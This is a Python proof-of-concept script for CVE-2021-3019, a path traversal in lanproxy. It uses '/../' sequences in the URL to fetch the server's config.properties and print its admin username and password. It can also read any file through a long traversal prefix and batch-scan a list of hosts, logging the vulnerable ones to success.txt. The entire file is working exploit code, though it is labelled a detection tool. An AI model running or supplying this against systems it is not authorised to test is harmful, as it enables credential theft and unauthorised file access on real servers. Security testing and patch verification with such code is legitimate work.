#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
'''
@File : urllib.py
@Time : 2021/01/10 21:59:32
@Author : _0xf4n9x_
@Version : 1.0
@Contact : [email protected]
@Desc : None
'''
import sys
import argparse
import os
from urllib import request
from urllib import error
# ASCII-art banner printed once at start-up by the __main__ guard.
banner = """
###### ## ## ######## ####### ##### ####### ## ####### ##### ## #######
## ## ## ## ## ## ## ## ## ## ## #### ## ## ## ## #### ## ##
## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
## ## ## ###### ##### ####### ## ## ####### ## ##### ####### ## ## ## ########
## ## ## ## ## ## ## ## ## ## ## ## ## ##
## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
###### ### ######## ######### ##### ######### ###### ####### ##### ###### #######
Author: _0xf4n9x_"""

# Request headers shared by every probe. The User-Agent is a fixed desktop
# browser string, so all requests sent by this script carry the same value.
headers = {
    'User-Agent': (
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
        "AppleWebKit/537.36 (KHTML, like Gecko) "
        "Chrome/82.0.4080.0 Safari/537.36 Edg/82.0.453.0"
    ),
}
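def readConf(url):
    """Check *url* for the lanproxy configuration-file read (CVE-2021-3019).

    Requests ``<url>/../conf/config.properties`` and reports the target as
    vulnerable only when the response body contains all four expected
    ``config.*`` keys. The path with its literal ``/../`` segment is built
    here by plain string concatenation.

    Args:
        url: Base URL of the target, without a trailing slash.

    Returns:
        The decoded configuration text when every marker key is present,
        the string ``'Bye :('`` when a marker is missing from the response,
        or ``0`` when the request or decoding failed.

    Note:
        A positive result includes the ``config.admin.username`` and
        ``config.admin.password`` entries, and run() prints it verbatim, so
        terminal output and captured logs then hold those values.
    """
    markers = (
        'config.server.bind',
        'config.server.port',
        'config.admin.username',
        'config.admin.password',
    )
    confUrl = url + "/../conf/config.properties"
    req = request.Request(confUrl, headers=headers)

    # Every failure path returns 0 explicitly so that callers comparing the
    # result against [0, 'Bye :('] never mistake an error for a finding.
    try:
        with request.urlopen(req, timeout=10) as resp:
            confContent = resp.read().decode('utf-8')
    except ConnectionResetError:
        print("[-] " + url + " Connection reset by peer")
        return 0
    except error.HTTPError as e:
        # e.code is an int; concatenating it unconverted raised TypeError
        # inside the handler and aborted the whole run on any HTTP error.
        print("[-] " + url + " " + str(e.code) + " " + str(e.reason))
        return 0
    except error.URLError as e:
        # A plain URLError has no .code attribute, only .reason.
        print("[-] " + url + " " + str(e.reason))
        return 0
    except Exception:
        # Timeouts, decode errors, etc. Narrower than a bare except so that
        # Ctrl-C (KeyboardInterrupt) still stops a long batch.
        print("[-] " + url + " is not vulnerable")
        return 0

    # Requiring all four keys keeps an unrelated 200 page (for example a
    # catch-all error page) from being counted as a positive.
    if not all(marker in confContent for marker in markers):
        print("[-] " + url + " is not vulnerable")
        return 'Bye :('

    print("[+] " + url + " is vulnerable! :)")
    return confContent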
def readOtherFile(url, path):
    """Request *path* behind the fixed traversal prefix and print the body.

    The requested URL is ``url`` + ``"/../../../../../../../../.."`` +
    ``path``. The response is decoded as UTF-8 and written to stdout.
    Nothing is caught here: errors from ``urlopen`` or from decoding
    propagate to the caller.

    Args:
        url: Base URL of the target, without a trailing slash.
        path: Path of the file to request, appended after the prefix.
    """
    target = "".join((url, "/../../../../../../../../..", path))
    req = request.Request(target, headers=headers)
    with request.urlopen(req, timeout=10) as resp:
        raw = resp.read()
    print(raw.decode('utf-8'))
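def _normalize_target(raw):
    """Return ``http://<host>`` for *raw*.

    Removes an ``http://`` prefix and every ``/`` before re-adding the
    scheme. Only ``http://`` is recognised; an ``https://`` prefix is not
    handled and produces a malformed URL.
    """
    return 'http://' + raw.replace('http://', '').replace('/', '')


def _is_positive(result):
    """Return True only when readConf() handed back configuration text.

    readConf() signals "no finding" with ``0`` or ``'Bye :('``; any other
    non-string value (such as ``None``) is treated as a failure too, so it
    cannot be recorded as a vulnerable host.
    """
    return isinstance(result, str) and result != 'Bye :('


def run(url, path="/../conf/config.properties"):
    """Check one target, or every target listed in a file.

    Args:
        url: Either a host/URL, or the path of an existing file holding one
            target per line. An existing file always selects batch mode.
        path: File to request from a single target. With the default value
            only the configuration check runs and its result is printed;
            with any other value the file is requested only after the
            configuration check was positive.

    Side effects:
        In batch mode each positive target is appended to ``success.txt``
        in the current working directory.
    """
    if not os.path.isfile(url):
        target = _normalize_target(url)
        if path == "/../conf/config.properties":
            print(readConf(target))
        elif _is_positive(readConf(target)):
            readOtherFile(target, path)
        return

    with open(url) as target_file:
        entries = target_file.read().splitlines()

    for entry in entries:
        entry = entry.strip()
        if not entry:
            # A blank line would otherwise become the host-less URL
            # "http://" and be probed like a real target.
            continue
        target = _normalize_target(entry)
        if _is_positive(readConf(target)):
            # The with-block closes the file; no explicit close() needed.
            with open("success.txt", "a+") as f:
                f.write(target + "\n")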
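def main():
    """Parse the command line and dispatch to run().

    ``-u/--url`` checks a single target (optionally with ``-r/--read`` to
    name the file to request); ``-f/--file`` checks every target listed in
    a file. With neither option the help text is printed.

    Dispatch is based on the parsed arguments rather than on positions in
    ``sys.argv``, so option order and the ``--url=value`` spelling work,
    and an unsupported combination yields an argparse error instead of a
    silent no-op.
    """
    parser = argparse.ArgumentParser(
        description="CVE-2021-3019 lanproxy arbitrary file read vulnerability detection POC")
    # -u and -f select different modes; argparse rejects using both at once.
    mode = parser.add_mutually_exclusive_group()
    mode.add_argument('-u', '--url', type=str,
                      help="test a single website")
    parser.add_argument('-r', '--read', type=str,
                        help="this parameter is followed by the file name to be read, the configuration file is read by default")
    mode.add_argument('-f', '--file', type=str,
                      help="perform vulnerability checks on multiple websites in a file, and the vulnerable websites will be output to the success.txt file")
    args = parser.parse_args()

    if args.url:
        if args.read:
            run(args.url, args.read)
        else:
            # Omit the path so run() uses its default configuration check.
            run(args.url)
    elif args.file:
        run(args.file)
    else:
        parser.print_help()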
# Script entry point: print the banner, then run the command-line handler.
# Nothing here executes when the module is imported.
if __name__ == "__main__":
    print(banner)
    main()